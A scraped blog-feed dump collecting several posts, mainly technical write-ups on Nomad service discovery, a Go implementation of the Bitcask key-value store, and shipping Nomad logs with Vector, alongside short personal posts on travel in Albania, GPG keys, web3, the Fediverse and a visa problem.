I’m running a redis job in Nomad, so I can query the service using the following command:\nnomad service info -namespace=default redis\nJob ID  Address              Tags  Node ID   Alloc ID\nredis   192.168.29.76:25395  []    9e02c85b  95170495\nredis   192.168.29.76:20888  []    9e02c85b  a1cf923c\nredis   192.168.29.76:26292  []    9e02c85b  a9d1181a\nNow, the same query can also be handled using the DNS server run by coredns:\ndoggo redis.default.nomad @tcp:\u002F\u002F127.0.0.1:1053\nNAME                \tTYPE\tCLASS\tTTL\tADDRESS      \tNAMESERVER     \nredis.default.nomad.\tA   \tIN   \t10s\t192.168.29.76\t127.0.0.1:1053\t\nredis.default.nomad.\tA   \tIN   \t10s\t192.168.29.76\t127.0.0.1:1053\t\nredis.default.nomad.\tA   \tIN   \t10s\t192.168.29.76\t127.0.0.1:1053\nQuerying an SRV record is also possible:\ndig +noall +answer +additional redis.default.nomad @127.0.0.1 -p 1053 SRV\nredis.default.nomad.\t10\tIN\tSRV\t10 10 25395 redis.default.nomad.\nredis.default.nomad.\t10\tIN\tSRV\t10 10 20888 redis.default.nomad.\nredis.default.nomad.\t10\tIN\tSRV\t10 10 26292 redis.default.nomad.\nredis.default.nomad.\t10\tIN\tA\t192.168.29.76\nredis.default.nomad.\t10\tIN\tA\t192.168.29.76\nredis.default.nomad.\t10\tIN\tA\t192.168.29.76\nCode#\nYou can check out the source code here.\nFin!",[],{"slug":1440,"title":1441,"link":1442,"pubDate":1443,"contentSnippet":1444,"tags":1445,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"tough-day-in-albania","A Tough Day in Albania","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ftough-day-in-albania\u002F","Tue, 27 Dec 2022 02:46:03 +0530","After attending DebConf22 in Kosovo, Akshat and I planned to spend a couple of days in Shkodër, Albania. From Prizren, Kosovo, we reached Tirana, Albania and stayed for a night. Many of the fellow Indians who attended DebConf22 were also with me. The next morning, we checked out and took a bus for Shkodër.\nWhile Akshat boarded the bus and sat with Abraham, I decided to search for some snacks outside before boarding. As a consequence, the bus got full and I didn’t get a seat. Seeing this, a lady from Germany sitting beside Abraham made space for me. Therefore, three people were sitting on two seats. It was a nice gesture, but obviously uncomfortable.\nThe weather was scorching hot, and the bus fans weren’t working properly. After a two-hour ride, we deboarded in Shkodër. Akshat and I had booked an apartment from Airbnb. Going by the location, we figured out it was 1 kilometer away, which we decided to walk.\nUpon reaching the location, we texted our apartment owner on Airbnb. On the other side was a lady, and we were not able to understand what she was saying as her texts weren’t in English. We tried translating her texts, but the translation didn’t make sense to us. She seemed to be saying that she had an appointment in the church at 3 o’clock.\nIt was very frustrating. We were standing in the hot sun with our apartment nowhere in sight. Then we tried calling her as I had a local SIM card. A boy was passing the street we were on, and we handed the phone to him. However, he could not translate what the lady said, as he probably didn’t know English.\nThen I left Akshat to search for anyone else who could translate. I came across a car repair shop where someone agreed to translate the call for me. After talking with the lady over the phone, the person told me that the location was 2 kilometers away and offered a ride in his car.
I told him that I would need to bring my friend as well.\nI went back to Akshat. A girl was passing by on a bicycle. We handed over the phone to her and phoned the lady from our Airbnb booking. The girl translated the call for us into English. She told us that they were calling us to Hotel Rozafa. We asked her for directions to Hotel Rozafa, and we later discovered that it was where the bus from Tirana dropped us, but we didn’t know that at the time. We walked towards Hotel Rozafa and came across the car repair shop I mentioned above. Turned out that the person who offered help earlier had left the car repair shop by then.\nThen a person at that car repair place gave us a few grapes and water. At that moment, a few grapes felt refreshing and energizing. Then we went ahead and bought water from a shop. The shopkeeper asked whether we were from Afghanistan, to which we said, “No, we are from India.”\nUpon reaching a shop named Neptune, Akshat texted the lady again, telling her that we had reached Neptune. Turned out they knew that shop, as a few minutes later, her husband was there. He came by taxi to pick us up. It was at this point that their plan was revealed. Earlier, I had wondered why they were calling us to Hotel Rozafa - it was to pick us up.\nFinally, we reached our apartment, and the lady and her husband gave us instructions about how things work at the apartment. She had to call her sister in Italy every time she needed to talk to us as she didn’t know English, so her sister acted as a translator.\nI have noticed with a couple of Airbnbs we had booked in Albania that the locations given online were not correct, and we had to ask for help from the locals. However, the locals in Albania were very helpful. Whether they knew English or not, they always tried to lend a helping hand. I think that the apartment owner taking a taxi to pick us up was a nice gesture as well.",[],{"slug":1447,"title":1448,"link":1449,"pubDate":1450,"contentSnippet":1451,"tags":1452,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"barreldb","Writing a disk-based key-value store in Golang","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbarreldb\u002F","2022-12-17T18:30:00.000Z","I’d been mulling over reading a computer science paper and implementing a project based on it. Distributed systems, Networking and Databases are some of the things that fascinate me a lot. However, I had been looking to implement a more approachable project to avoid getting inundated initially. And I happened to chance upon the Bitcask paper through Avinash’s project: CaskDB.\nAfter giving this reasonably short paper a quick read, I decided to write a Golang implementation of the same, as it looked like an exciting project. If you’re interested in checking out the complete project, check out BarrelDB.\nBitcask is a disk-based key-value storage engine designed for fast read and write operations. It is mainly in production use by Riak (which is a distributed database) as one of the storage engines. Bitcask under the hood has a straightforward yet clever design. It writes to the file in an append-only mode.
This means that writes are performed only by appending to the end of the file, thus avoiding the need to perform any random disk seeks.\nLet’s look at various components of Bitcask:\nFormat of the record#\n[diagram of the record format]\nCRC: Stores the checksum of the value to ensure data consistency.\nTimestamp: Timestamp in UNIX format, stored as uint32.\nExpiry: If the record has an expiry defined, the expiry timestamp, in UNIX format, stored as uint32.\nKey Size: Size of the key in bytes.\nValue Size: Size of the value in bytes.\nKey\nValue\nThis additional metadata stored alongside the key\u002Fvalue is represented with a fixed-width header. Each field is represented as a uint32, so the total size of the header is 4*5 = 20 bytes. Here’s the code which encodes and decodes this record:\ntype Record struct {\n    Header Header\n    Key    string\n    Value  []byte\n}\n\n\u002F\u002F Header represents the fixed width fields present at the start of every record.\ntype Header struct {\n    Checksum  uint32\n    Timestamp uint32\n    Expiry    uint32\n    KeySize   uint32\n    ValSize   uint32\n}\n\n\u002F\u002F Encode takes a byte buffer, encodes the value of the header and writes it to the buffer.\nfunc (h *Header) encode(buf *bytes.Buffer) error {\n    return binary.Write(buf, binary.LittleEndian, h)\n}\n\n\u002F\u002F Decode takes a record's raw bytes and decodes the binary value into the header.\nfunc (h *Header) decode(record []byte) error {\n    return binary.Read(bytes.NewReader(record), binary.LittleEndian, h)\n}\nThe record is encoded in this binary format before storing it on the disk.\nDatafile#\nA “datafile” (the term used for the DB file on disk) is an append-only record of all the write operations. An instance of Bitcask can have several datafiles. However, there’s only one “active” datafile. In BarrelDB, a goroutine runs in the background at regular intervals to check if the size of the active DB file has crossed the threshold and then rotates the active file. It appends this DB file to the list of “stale” data files. All the new writes only happen to the “active” data file, and the stale files are merged as a part of the “compaction” process (described later in the post).\n\nHere’s how a datafile is represented:\ntype DataFile struct {\n    sync.RWMutex\n\n    writer *os.File\n    reader *os.File\n    id     int\n\n    offset int\n}\nIt contains separate file handles for writing and reading the file. The reason we have two file handles instead of re-using the same one is that the writer is only opened in an “append-only” mode. In addition, since the active file can be rotated, the writer can be set to nil, ensuring no new writes ever happen on that file.\n    writer, err := os.OpenFile(path, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)\n    if err != nil {\n        return nil, fmt.Errorf(\"error opening file for writing db: %w\", err)\n    }\n\n    \u002F\u002F Create a reader for reading the db file.\n    reader, err := os.Open(path)\n    if err != nil {\n        return nil, fmt.Errorf(\"error opening file for reading db: %w\", err)\n    }\nKeyDir#\nIn addition to storing the file on disk, Bitcask also stores additional metadata, which defines how to retrieve the record. This hashtable is a map of keys with this metadata and is referred to as KeyDir. An important point to note here is that the value is never stored in this map.
This makes it possible for Bitcask to handle datasets larger than what the RAM can hold.\n\u002F\u002F KeyDir represents an in-memory hash for faster lookups of the key.\n\u002F\u002F Once the key is found in the map, the additional metadata, like the record offset\n\u002F\u002F and the file ID, is used to extract the underlying record from the disk.\n\u002F\u002F Advantage is that this approach only requires a single disk seek of the db file\n\u002F\u002F since the position offset (in bytes) is already stored.\ntype KeyDir map[string]Meta\n\n\u002F\u002F Meta represents some additional properties for the given key.\n\u002F\u002F The actual value of the key is not stored in the in-memory hashtable.\ntype Meta struct {\n    Timestamp  int\n    RecordSize int\n    RecordPos  int\n    FileID     int\n}\nHere, RecordPos tells the record’s position offset (in bytes) in the entire file. Since the position of the record is stored in memory along with the key, the retrieval of the key doesn’t require more than a single disk seek. Bitcask achieves really low latency even with many keys in the database. A file system read-ahead cache also helps boost the performance and comes for free - no need to design a separate caching mechanism.\n\nCompaction#\nAs we saw previously, a datafile is simply an append-only sequence of writes. Any modification of a key is merely a new record appended to the datafile. KeyDir overwrites the entry of the key with the new metadata, which contains the new location of the record. Thus all reads will automatically return the updated value.\nDeletes are handled similarly by writing a “tombstone” record for the key. When the user requests the key after it’s been deleted, BarrelDB can check whether that value equals the tombstone value and return an appropriate error.\nAs you would have guessed, our database will grow unbounded if we don’t perform any garbage cleanup. The datafiles need to be pruned for deleting expired\u002Fdeleted records and merging all stale files into a single active file - to keep the number of opened files in check. All of these processes are together called “Compaction”.\nLet’s take a look at how each of these compaction routines works under the hood:\nMerge#\nThe merge process iterates over all the keys inside KeyDir and fetches their values. A value could come from a stale file as well. Once the new keys\u002Fvalues are updated, it writes them to a new active file. All the old file handles are closed, and the stale files are deleted from the disk. The KeyDir is updated similarly, since the new records live in a different position\u002Ffile.\nHints File#\nThe Bitcask paper describes a way of creating a “hints” file that is loaded when the database starts, for a faster startup time. This file is essential to bootstrap KeyDir after a cold startup. It avoids iterating over all data files and reading their values sequentially. In BarrelDB, gob encoding is used to dump the KeyDir map to disk.\n\u002F\u002F generateHints encodes the contents of the in-memory hashtable\n\u002F\u002F as `gob` and writes the data to a hints file.\nfunc (b *Barrel) generateHints() error {\n    path := filepath.Join(b.opts.dir, HINTS_FILE)\n    if err := b.keydir.Encode(path); err != nil {\n        return err\n    }\n\n    return nil\n}\nDuring startup, BarrelDB checks for the presence of a .hints file, decodes this gob dump, and loads the data into KeyDir.\nRemoving expired keys#\nA goroutine runs at a configurable interval to check if the value of a key has expired. If it has, it deletes the entry from KeyDir. During the following merge process, since this entry won’t be present in KeyDir, it’ll automatically be removed when the new datafile is created.\nTo check if the key has expired, a simple check, like comparing timestamps in UNIX epoch format, is enough: time.Now().Unix() > int64(r.Header.Expiry).
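To make this concrete, here’s a minimal sketch of what such a sweep goroutine could look like. This is an illustration based on the description above, not BarrelDB’s actual code, and it assumes (purely for the sketch) that Barrel embeds a mutex and that the expiry is also tracked in the in-memory Meta:\n\u002F\u002F runExpirySweep is a hypothetical sketch of the background expiry sweep.\n\u002F\u002F It assumes Barrel embeds sync.Mutex and that Meta carries an Expiry field.\nfunc (b *Barrel) runExpirySweep(interval time.Duration) {\n    ticker := time.NewTicker(interval)\n    defer ticker.Stop()\n\n    for range ticker.C {\n        b.Lock()\n        for key, meta := range b.keydir {\n            \u002F\u002F Treat a zero expiry as \"never expires\".\n            if meta.Expiry != 0 && time.Now().Unix() > int64(meta.Expiry) {\n                \u002F\u002F Dropping the entry from KeyDir is enough; the stale record\n                \u002F\u002F on disk gets cleaned up by the next merge.\n                delete(b.keydir, key)\n            }\n        }\n        b.Unlock()\n    }\n}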
Redis Server#\nIn addition to using BarrelDB as a Go library, I also implemented a redis-compatible server. I found tidwall\u002Fredcon to be an easy-to-use library for creating a Redis-compatible server in Go applications. All I had to do was wrap BarrelDB API methods and define handlers for SET\u002FGET.\nI was able to use redis-cli and connect to the BarrelDB server:\n127.0.0.1:6379> set hello world\nOK\n127.0.0.1:6379> get hello\n\"world\"\nBenchmarks#\nYou can check the repo for the actual benchmarks. However, I’d like to point out some inferences from the redis-benchmark results.\nFirst, let’s send 100000 requests to the server using 50 parallel clients. This command creates a unique key for each SET operation.\nredis-benchmark -p 6379 -c 50 -t set -n 100000 -r 100000000\n\nSummary:\n  throughput summary: 145985.41 requests per second\n  latency summary (msec):\n          avg       min       p50       p95       p99       max\n        0.179     0.016     0.183     0.207     0.399     1.727\nSo, ~145k requests per second is not bad at all for a disk-based KV. But the exciting thing to note here is that the performance is predictable even if you increase the load by increasing clients:\nredis-benchmark -p 6379 -c 200 -t set -n 100000 -r 100000000\n\nSummary:\n  throughput summary: 140845.08 requests per second\n  latency summary (msec):\n          avg       min       p50       p95       p99       max\n        0.718     0.224     0.711     0.927     1.183     5.775\nIf we increase the number of requests (by 5x) as well, the throughput looks almost the same:\nredis-benchmark -p 6379 -c 200 -t set -n 500000 -r 100000000\n\nSummary:\n  throughput summary: 138350.86 requests per second\n  latency summary (msec):\n          avg       min       p50       p95       p99       max\n        0.748     0.056     0.711     0.879     1.135    63.135\nThis magic is all because of the way Bitcask uses a log-structured hash table (just append-only records for writing data). Even with a lot of records, all it has to do is write to the end of the file, which avoids expensive random I\u002FO operations.\nSummary#\nOverall, I am happy with the BarrelDB implementation, as I covered everything described in the paper. This project had excellent learning outcomes for me. I spent a lot of time coming up with a design for structuring the different components and their API methods and handling all the edge scenarios during the compaction process. Though full credit to Bitcask for keeping its design so elegant and minimal, yet achieving some significant numbers in the benchmarks. This is also a reminder that simple need not necessarily mean less powerful.\nI look forward to implementing a distributed KV store by adding support for multiple BarrelDB nodes connected via Raft.
For now, gonna enjoy some chai and release this project to the WWW :)\nFin!",[],{"slug":1454,"title":1455,"link":1456,"pubDate":1457,"contentSnippet":1458,"tags":1459,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"updated-gpg-keys","Announcement: I updated my gpg keys","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fupdated-gpg-keys\u002F","Sat, 19 Nov 2022 16:01:36 +0530","I updated my gpg keys because I had a 3072-bit RSA key and Debian requires a 4096-bit RSA or an elliptic-curve key. The key fingerprint is:\nFF7D B951 7CE1 E19B 6EFE 695F E0E5 BAFD 3BBF 70B3\nCheck my gpg page for details.\nSo, if you are from the Debian community and are signing someone else’s keys which they will be using for the purposes of Debian, make sure they are using a 4096-bit RSA key or an elliptic-curve key.",[],{"slug":1461,"title":1462,"link":1463,"pubDate":1464,"contentSnippet":1465,"tags":1466,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"web2-web3","But, aren't you folks web2?","https:\u002F\u002Fnadh.in\u002Fblog\u002Fweb2-web3\u002F","Tue, 15 Nov 2022 00:00:00 +0000","It took me several seconds to parse the casual quip “But, aren’t you folks web2?”. I probed further and they continued—“Isn’t Zerodha[1] web2? Why don’t you convert it to web3?”. For the next few minutes, I struggled to explain how technologies, processes, people, regulations, laws, industry, and the entire legal and societal foundation that underlie an organisation, no matter how imperfect, aren’t “web2”, and that they can’t just be converted to “web3”, whatever that meant. To my question as to why they called a whole bunch of things web2 and why they think it should be converted to web3, they didn’t have an answer. This interaction happened a few months ago with a young developer in their early twenties working for an American web3 startup. Since then, I have had a few more interactions including a few startup pitches, all eerily similar. All young people in their early twenties right out of college working on web3 things, all dismissive of everything non-web3 as web2. This conversation came up again this week in light of the new meltdowns unraveling[2] in the crypto world.",[],{"slug":1468,"title":1469,"link":1470,"pubDate":1471,"contentSnippet":1472,"tags":1473,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"intro-to-fediverse","Introducing Fediverse: A Decentralized Social Media","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fintro-to-fediverse\u002F","Sat, 29 Oct 2022 14:44:56 +0530","Finally, Elon Musk is the owner of Twitter. On the first day after the takeover, Twitter has already undergone some major changes. If you are wondering what the big deal is, here is a reminder that tech giants work for profit and control, rather than to make the world a better place. While I do not consider the previous CEO of Twitter to be good, the takeover by Musk may have made people more receptive to the ideas I am going to discuss.\nThis is a problem of centralization\nCentralized services such as Twitter are vulnerable to such handovers. Even if the company is good today, it may get compromised in future due to a change of ownership. The same thing happened with WhatsApp.
After Facebook took over WhatsApp, it later introduced a policy to share data of WhatsApp users with Facebook.\nIntroducing Fediverse\n[Fediverse logo]\nFediverse is NOT another company or a startup, but rather a community-made project.\nFediverse is a decentralized social network, where users using different services can follow, boost posts, and communicate with each other, similar to how users with accounts on different email providers can email each other. Different services on Fediverse have different policies, so you can choose a service which suits your needs. Anyone can self-host their instance of Fediverse, or pay someone to host it for them (just like any task in the world). There is no single company or person who owns Fediverse; rather, different instances have different admins, usually running the service in their free time, so don’t forget to send them a donation if you like the service. Fediverse users do not get tied to a particular service: when they change their service providers, they can migrate their friends and followers, so they don’t need to start from scratch again.\nFediverse is a collection of different types of services. For example, Mastodon is like Twitter (according to use-case), Friendica is like Facebook, Pixelfed is for sharing images, similar to Instagram, and PeerTube is for sharing videos, a replacement for YouTube.\nEach service on Fediverse is free software, which means you can add features yourself as well. For example, let’s say Mastodon does not have a feature and you would like to add it; then you have the ability to run your modified version of Mastodon on your server as well. You can pay someone to add that feature too, or you can collaborate with others who like the same feature and collectively crowdfund to add that feature.\nYou can learn more about Fediverse here. Further, this is a good unofficial guide to get started. We need to fight for our freedom. You can take a step by deleting your Twitter account, or just trying out Fediverse and bringing your friends to Fediverse to reduce your dependence on Twitter, Facebook and Instagram. I suggest that major organizations (which usually have the resources) switch to Fediverse, which will raise awareness about it among their users. If they don’t feel like deleting their Twitter account, Fediverse can still reduce their dependence on it and, hopefully, more users will join.\nMy profile on Fediverse is here. Feel free to connect.\nFor further reading on this topic, check out this blog post by Free Software Community of India.",[],{"slug":1475,"title":1476,"link":1477,"pubDate":1478,"contentSnippet":1479,"tags":1480,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-27","A Clojure view of \"Mars Rover\"","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fclojure-mars-rover\u002Findex.html","Wed, 19 Oct 2022 00:00:00 +0000","Here I illustrate how Clojurists (including Yours Truly) like to solve problems and model things using hammocks, pure functions, and the \"it's just data\" ideology.
Also, while the *problem* focuses on \"design in the small\" of application logic, many ideas in the *solution* can—and do—scale all the way to \"design in the large\" of whole systems.",[52,456,531,530],{"slug":1482,"title":1483,"link":1484,"pubDate":1485,"contentSnippet":1486,"tags":1487,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"couldnt-attend-libreoffice-conference","Couldn't Attend Libreoffice Conference 2022 in Italy","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fcouldnt-attend-libreoffice-conference\u002F","Tue, 04 Oct 2022 19:29:56 +0530","This year, The Document Foundation (TDF) invited me to attend the LibreOffice conference in Milan, Italy. In order to travel to Italy, I needed a visa.\nTo apply for the same, I had to book an appointment with VFS Global and submit the required documents. The conference was to be held from the 28th of September to the 1st of October 2022. I started checking for visa appointments on the 10th of August. However, I got no available slots in Delhi. I also checked the availability of appointments in other cities. I saw appointments were available in Kolkata, which is pretty far from where I live, and I didn’t want to spend that much time and money for the visa.\nAfter looking for appointments at the VFS Delhi center for 8 consecutive days, I got one for the 22nd of August. During my appointment, I was informed by the staff that I had applied in the wrong category - tourist. They told me further that if my purpose of travel was to attend a conference, then the category of application should be “business” or “invitation.” Therefore, I was advised to book another appointment in the correct category. It was not a visa refusal. I didn’t get to pay my visa fee or submit my documents.\nI tried to book another appointment in the correct category meant for attending conferences, but didn’t get any slots for days, and so I finally gave up in mid-September and told the conference organizers that I wouldn’t be able to join.\nFinally, I would like to end this post by thanking TDF for inviting me to the conference and offering to sponsor my costs. It is unfortunate that I could not attend.",[],{"slug":1489,"title":1490,"link":1491,"pubDate":1492,"contentSnippet":1493,"tags":1494,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"nomad-logging","Logging on Nomad with Vector","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fnomad-logging\u002F","2022-09-03T18:40:55.000Z","Application orchestrators like Nomad, Kubernetes etc. allow you to deploy multiple applications on the same host. Logs are stored on the underlying node wherever the applications are run. However, it’s pretty common to treat these instances as ephemeral if they’re a part of an autoscaling group. Therefore, depending on the node’s availability to search these logs is not practical, as the node can go down anytime. Moreover, in most cases, access to these nodes is limited to cluster administrators, not the maintainers (developers\u002Fapplication owners). In such cases, a log shipping agent must ship and aggregate logs from all cluster nodes and store them in a central store (like Elasticsearch, Clickhouse or Loki).\nI’d recommend reading this excellent post by Adrian, who has explained how to set up a Vector logging pipeline for applications running with the docker task driver and ship the logs to Loki. For applications running with the docker task driver, Nomad piggybacks on the docker daemon for configuring logging options.
Docker daemon supports many logging options; in my experience, the journald log driver works reliably well.\nHowever, this post is about tasks not using docker but any other driver (e.g. raw_exec and exec). Nomad doesn’t provide many configuration options for logging for these drivers. The biggest issue is that Nomad logs the application’s stdout\u002Fstderr streams to the log directory as-is, without annotating any metadata about the task. This means that if you have multiple applications running on one host, the log shipping agent will not be able to identify which application’s logs are being ingested.\nConsider this as an example. We’re running a simple web server using the exec driver:\njob \"http\" {\n  datacenters = [\"dc1\"]\n  type        = \"service\"\n\n  group \"app\" {\n    count = 1\n    network {\n      mode = \"bridge\"\n      port \"python-http\" {\n        to = \"8888\"\n      }\n    }\n\n    task \"server\" {\n      driver = \"exec\"\n\n      config {\n        command = \"\u002Fusr\u002Fbin\u002Fpython3\"\n        args    = [\"-m\", \"http.server\", \"8888\"]\n      }\n    }\n  }\n}\nOnce the alloc is running, we can find its IP address using:\nnomad alloc status 1d05d64b | grep -A 3 'Allocation Addresses'\nAllocation Addresses (mode = \"bridge\")\nLabel         Dynamic  Address\n*python-http  yes      192.168.29.76:31775 -> 8888\nOn sending an HTTP request using cURL, we can see the logs that this webserver generated:\ncurl -i 192.168.29.76:31775\nHTTP\u002F1.0 200 OK\nServer: SimpleHTTP\u002F0.6 Python\u002F3.10.4\nDate: Sun, 04 Sep 2022 06:18:45 GMT\nContent-type: text\u002Fhtml; charset=utf-8\nContent-Length: 869\n...\nNomad stores the logs inside the application’s allocation directory, inside \u002Fopt\u002Fnomad\u002Fdata\u002Falloc. To see the logs for the above allocation ID, we can use:\ntail -f \u002Fopt\u002Fnomad\u002Fdata\u002Falloc\u002F1d05d64b-4b59-3c65-8261-760499d9e4f6\u002Falloc\u002Flogs\u002Fserver.stderr.0\n192.168.29.76 - - [04\u002FSep\u002F2022 11:48:26] \"GET \u002F HTTP\u002F1.1\" 200 -\n192.168.29.76 - - [04\u002FSep\u002F2022 11:48:45] \"GET \u002F HTTP\u002F1.1\" 200 -\nEnriching logs with metadata#\nAs you can see, these logs are precisely what the python3 -m http.server command generates. Ideally, Nomad should have enriched these logs with metadata about the allocation ID, job name, namespace, the node it’s running on, etc., as noted in this GitHub issue.\nHowever, since that’s not yet available, I brainstormed a few different options:\nApproach 1: Sidecar#\nThe first approach was to run vector as a sidecar next to the main task. This is the simplest option, to begin with. Vector can be independently configured to add metadata to the logs collected from the allocation directory of the group. However, as with every sidecar deployment, there’s a lot of extra resource usage. For every 10 different groups, reserving resources for 10 vector agents quickly eats up the available CPU\u002Fmemory of the underlying node. A more critical downside, though, was asking every developer to also configure a Vector sidecar job. Keeping all these configs in sync to ensure they’re unified across namespaces is another headache. Due to these reasons, I discarded this option early on. However, if your deployment scale (in terms of the number of applications managed) is relatively small, this is actually not a bad idea.
Approach 2: Events Stream#\nMy next option was to listen to the Nomad events stream and generate a “vector” configuration template to collect logs and enrich them with metadata from the events stream. I developed v0.1 of nomad-vector-logger based on this concept. Since I’d written a wrapper to collect events from Nomad using nomad-events-sink, it was relatively straightforward to extend it to generate a vector.toml config. However, after testing in prod for a few days, I noticed that relying on the events stream is unreliable. Nomad events are not WebSocket based (as of yet). It’s a simple long polling mechanism which sends events to a Go channel as and when they happen. What happens when you miss an event? What happens when you run nomad system gc, which clears the events index? These were some of the challenges I faced with this v0.1 approach. There needs to be some sort of “reconcile” mechanism that periodically runs. A reconciliation loop that lists all allocations using the HTTP API can help whenever there are missing events.\nApproach 3: Enrichment Tables#\nI also posted about the above program in Vector’s discord group (they’re super active+helpful folks) and discussed this daemon with them. They also suggested a simpler alternative: generating a CSV of running allocations instead of a .toml config. Vector has support for Enrichment Tables, which means that it can “lookup” a CSV file to find a particular row and enrich the log event with the information found in the CSV. This seemed a super cool idea, and I developed v0.2 using this. Super thankful to the Vector maintainers for giving me this idea!\nHowever, this approach had a few “subtle” drawbacks that I found:\nvector doesn’t support live-reloading if the CSV file changes. vector has support for watching a config file for changes or sending a SIGHUP to reload. However, that only works for vector’s own config files. Since the CSV file is an external file, vector cannot watch it for changes. I came up with an ugly bash script hack that compared the md5 hash of the file in a while loop and, if it changed, sent a SIGHUP to vector. All I can say is it’s ugly, but it works. If you wish to see it, it’s available here in all its glory.\nThe most significant issue was the chance of losing logs for the initial 10-20s of a new allocation. The above shell script had a sleep(10) because running md5sum frequently can be a bit CPU intensive. Vector sees a new allocation and starts ingesting events. It tries to look up the CSV row by the allocation ID, but it doesn’t find it yet in the CSV file, complains about it, and drops the log event. Thus, I had to drop the CSV idea in search of a more reliable approach. For people interested in this approach, you can check out the csv branch here.\nApproach 4: Periodic Reconciliation Loop#\nThe final v0.3.0 solution, which IMHO fixed all the above issues, was:\nSkip the Nomad events stream. Since I have to build a reconciliation loop anyway, listening to events is just extra work without tangible benefits.\nI used a background goroutine to periodically refresh the list of allocations running on that node. Even if I fetched this list once every 30s or so, it’s OK because Vector will start ingesting logs once the config gets generated. It will start reading the file from the beginning. So logs aren’t lost even if the config is templated well after the alloc started running.
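For illustration, the reconciliation loop could look roughly like this. The helper names (fetchAllocs, renderConfig) are made up for this sketch and are not the actual nomad-vector-logger internals:\n\u002F\u002F reconcileLoop is a hypothetical sketch of the periodic reconciliation\n\u002F\u002F described above; fetchAllocs and renderConfig are illustrative stand-ins.\nfunc (a *App) reconcileLoop(ctx context.Context, interval time.Duration) {\n    ticker := time.NewTicker(interval)\n    defer ticker.Stop()\n\n    for {\n        select {\n        case \u003C-ctx.Done():\n            return\n        case \u003C-ticker.C:\n            \u002F\u002F List the allocations currently running on this node via the Nomad HTTP API.\n            allocs, err := a.fetchAllocs()\n            if err != nil {\n                log.Printf(\"error fetching allocs: %v\", err)\n                continue\n            }\n            \u002F\u002F Re-template the vector config with a source\u002Ftransform pair per task,\n            \u002F\u002F as shown in the generated config below.\n            if err := a.renderConfig(allocs); err != nil {\n                log.Printf(\"error rendering config: %v\", err)\n            }\n        }\n    }\n}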
I added support to delay the removal of an allocation from the config file. If an allocation is stopped (e.g., a new version is deployed or the job is restarted), the program doesn’t immediately remove the allocation from the config file. The user can set a delay period which works like a cooling-down period. In this period, one can assume that Vector would have finished sending all logs to the upstream sink. If the application generates logs faster than the upstream sink can accept (e.g. if the upstream Elasticsearch gets slower) and we remove the allocation immediately whenever it stops, there’s a probability that Vector wouldn’t have read the file to the end. This cooling period helps to ensure that doesn’t happen. It is not fool-proof, but it should cover most cases unless the upstream sink is dead for many hours.\nHow it works#\nNow that we’ve covered a few different approaches and the pros\u002Fcons of each, let’s see how nomad-vector-logger works. Essentially, nomad-vector-logger is meant to be deployed inside a Nomad cluster as a system job. A system job in Nomad runs on each node. Whenever a new node gets added to the cluster, Nomad’s scheduler schedules a copy of this program on that new node automatically. This is the equivalent of a “DaemonSet” in K8s.\nnomad-vector-logger uses Nomad’s HTTP API to query the running allocations on its node. Once it gets the list, it adds it to an internal map and signals to generate a config.\nThe final config that is templated out looks like this:\n[sources.source_nomad_alloc_64a2f9fd-e003-0bb3-b5cd-838125283a06_proxy]\ntype = \"file\"\ninclude = [ \"\u002Fopt\u002Fnomad\u002Fdata\u002Falloc\u002F64a2f9fd-e003-0bb3-b5cd-838125283a06\u002Falloc\u002Flogs\u002Fproxy*\" ]\nline_delimiter = \"\\n\"\nread_from = \"beginning\"\n\n[transforms.transform_nomad_alloc_64a2f9fd-e003-0bb3-b5cd-838125283a06_proxy]\ntype = \"remap\"\ninputs = [\"source_nomad_alloc_64a2f9fd-e003-0bb3-b5cd-838125283a06_proxy\"]\nsource = '''\n# Store Nomad metadata.\n.nomad.namespace = \"default\"\n.nomad.node_name = \"pop-os\"\n.nomad.job_name = \"nginx\"\n.nomad.group_name = \"nginx\"\n.nomad.task_name = \"proxy\"\n.nomad.alloc_id = \"64a2f9fd-e003-0bb3-b5cd-838125283a06\"\n'''\nFor people unfamiliar with vector, this config is essentially doing 2 things:\nIt gets logs from a “file” source. The file path comes from nomad-vector-logger (where all the logs for the proxy task are located).\nIt adds a JSON object nomad with relevant keys.\nThe Vector pipeline will send this event to another “transform” which can further process the log event (e.g. parsing it as logfmt or JSON) and then finally send it to an upstream sink like Loki\u002FElasticsearch.\nHere’s an example of the before\u002Fafter of a log line shown above in this post:\nBefore#\n[screenshot: the raw log line as written by the task]\nAfter#\n[screenshot: the same log line enriched with the nomad metadata]\nPerfect! We’ve annotated the same log event with Nomad metadata, and Vector will be able to identify these logs.
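The before\u002Fafter screenshots aren’t reproduced here, but going by the remap transform above, an enriched event would look roughly like this (the exact top-level field names depend on the source\u002Ftransform configuration):\n{\n  \"message\": \"\u003Cthe raw log line, exactly as the task wrote it\u003E\",\n  \"nomad\": {\n    \"namespace\": \"default\",\n    \"node_name\": \"pop-os\",\n    \"job_name\": \"nginx\",\n    \"group_name\": \"nginx\",\n    \"task_name\": \"proxy\",\n    \"alloc_id\": \"64a2f9fd-e003-0bb3-b5cd-838125283a06\"\n  }\n}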
